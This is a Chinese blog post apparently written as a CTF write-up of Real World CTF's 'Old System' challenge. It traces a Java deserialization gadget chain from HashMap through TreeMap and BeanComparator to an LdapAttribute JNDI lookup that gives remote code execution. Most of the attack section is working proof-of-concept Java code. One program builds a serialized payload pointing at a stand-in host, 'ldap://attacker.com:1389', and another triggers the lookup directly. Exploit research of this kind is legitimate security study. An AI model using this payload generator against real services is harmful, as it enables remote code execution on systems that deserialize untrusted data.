Real Wolrd CTF Old System New Getter Jndi Gadget

Y4er 收录于类别代码审计和系列 Series

2021-01-14 2021-01-14 约 1498 字预计阅读 3 分钟

警告

本文最后更新于 2021-01-14，文中内容可能已过时。

昨天晚上看了长亭的一篇Real Wolrd CTF 3rd Writeup | Old System 推文，觉得很有意思，自己研究下。

# 挖掘过程

概述：从HashMap触发TreeMap的get()从而进入到compare()。

web.xml中声明了servlet路由，在其代码中进行了反序列化

而this.appClassLoader将反序列化能用的类限制在jdk标准库和classpath中。

其中cc库为2.1没有InvokerTransformer或InstantiateTransformer。

cc库走不通，看cb库 org.apache.commons.beanutils.BeanComparator，很明显可以调用任意对象的getter方法。

在yso中是使用PriorityQueue来自动进入compare方法中，而目标环境是jdk1.4，没有PriorityQueue类。低版本的jdk肯定有对PriorityQueue自动排序队列的另一种实现，即如下调用栈

1
2
3
4
5
6
7
java.util.HashMap#readObject
java.util.HashMap#putForCreate
java.util.HashMap#eq
java.util.AbstractMap#equals
java.util.TreeMap#get
java.util.TreeMap#getEntry
            org.apache.commons.beanutils.BeanComparator#compare

通过TreeMap的get()方法触发getEntry()从而触发compare()

我这里使用的是jdk1.8的代码，大差不差最后都能触发compare()。那么现在的关键点就在于如何触发TreeMap.get()。

在HashMap反序列化时会调用到putForCreate()：

图来自原文

putForCreate用于判断hash是否一致，可以通过构造值一样但引用地址不一样的两个对象来解决。

1
2
3
4
5
6
7
TreeMap treeMap1 = new TreeMap(comparator);
treeMap1.put(payloadObject, "aaa");
TreeMap treeMap2 = new TreeMap(comparator);
treeMap2.put(payloadObject, "aaa");
HashMap hashMap = new HashMap();
hashMap.put(treeMap1, "bbb");
hashMap.put(treeMap2, "ccc");

这样就完成了从反序列化入口readObject()到BeanComparator.compare()的调用。

现在的问题就是找到RCE的最终点。而在org.apache.commons.beanutils.BeanComparator中是可以调用任意getter方法的，通过PropertyUtils.getProperty()。

而TemplatesImpl和JdbcRowSetImpl在jdk1.4的版本里都是没有的。作者挖到了一条新链，直接贴调用栈

1
2
3
4
5
6
7
8
9
com.sun.jndi.ldap.LdapAttribute#getAttributeDefinition
-> javax.naming.directory.InitialDirContext#getSchema(javax.naming.Name)
-> com.sun.jndi.toolkit.ctx.PartialCompositeDirContext#getSchema(javax.naming.Name)
-> com.sun.jndi.toolkit.ctx.ComponentDirContext#p_getSchema
-> com.sun.jndi.toolkit.ctx.ComponentContext#p_resolveIntermediate
-> com.sun.jndi.toolkit.ctx.AtomicContext#c_resolveIntermediate_nns
-> com.sun.jndi.toolkit.ctx.ComponentContext#c_resolveIntermediate_nns
-> com.sun.jndi.ldap.LdapCtx#c_lookup
-> RCE

贴一下图，通过传入property为attributeDefinition来触发com.sun.jndi.ldap.LdapAttribute#getAttributeDefinition，而在这个类的调用过程中进行了lookup()。

这里直接跳转lookup的底层实现进行jndi查询。

# POC

不仅仅适用于jdk1.4，在1.8也测试成功。利用场景在有任意的getter方法调用。

CTF的题解payload

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import org.apache.commons.beanutils.BeanComparator;
import javax.naming.CompositeName;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.TreeMap;
public class PayloadGenerator {
public static void main(String[] args) throws Exception {
        String ldapCtxUrl = "ldap://attacker.com:1389";
        Class ldapAttributeClazz = Class.forName("com.sun.jndi.ldap.LdapAttribute");
        Constructor ldapAttributeClazzConstructor = ldapAttributeClazz.getDeclaredConstructor(
new Class[] {String.class});
        ldapAttributeClazzConstructor.setAccessible(true);
        Object ldapAttribute = ldapAttributeClazzConstructor.newInstance(
new Object[] {"name"});
        Field baseCtxUrlField = ldapAttributeClazz.getDeclaredField("baseCtxURL");
        baseCtxUrlField.setAccessible(true);
        baseCtxUrlField.set(ldapAttribute, ldapCtxUrl);
        Field rdnField = ldapAttributeClazz.getDeclaredField("rdn");
        rdnField.setAccessible(true);
        rdnField.set(ldapAttribute, new CompositeName("a//b"));
// Generate payload
        BeanComparator comparator = new BeanComparator("class");
        TreeMap treeMap1 = new TreeMap(comparator);
        treeMap1.put(ldapAttribute, "aaa");
        TreeMap treeMap2 = new TreeMap(comparator);
        treeMap2.put(ldapAttribute, "aaa");
        HashMap hashMap = new HashMap();
        hashMap.put(treeMap1, "bbb");
        hashMap.put(treeMap2, "ccc");
        Field propertyField = BeanComparator.class.getDeclaredField("property");
        propertyField.setAccessible(true);
        propertyField.set(comparator, "attributeDefinition");
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("object.ser"));
        oos.writeObject(hashMap);
        oos.close();
    }
}

在jdk1.8中可以用下面的，只构造了后半截，TreeMap的部分需要具体问题具体分析，只要可以调用getAttributeDefinition即可。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
package com.test;

import javax.naming.CompositeName;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;

public class Main {

    public static void main(String[] args) {
        try {
            String ldapCtxUrl = "ldap://localhost:1389";
            Class ldapAttributeClazz = Class.forName("com.sun.jndi.ldap.LdapAttribute");

            Constructor ldapAttributeClazzConstructor = ldapAttributeClazz.getDeclaredConstructor(
                    new Class[]{String.class});
            ldapAttributeClazzConstructor.setAccessible(true);
            Object ldapAttribute = ldapAttributeClazzConstructor.newInstance(
                    new Object[]{"name"});

            Field baseCtxUrlField = ldapAttributeClazz.getDeclaredField("baseCtxURL");
            baseCtxUrlField.setAccessible(true);
            baseCtxUrlField.set(ldapAttribute, ldapCtxUrl);

            Field rdnField = ldapAttributeClazz.getDeclaredField("rdn");
            rdnField.setAccessible(true);
            rdnField.set(ldapAttribute, new CompositeName("a//b"));

            Method getAttributeDefinitionMethod = ldapAttributeClazz.getMethod("getAttributeDefinition", new Class[]{});
            getAttributeDefinitionMethod.setAccessible(true);
            getAttributeDefinitionMethod.invoke(ldapAttribute, new Object[]{});
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}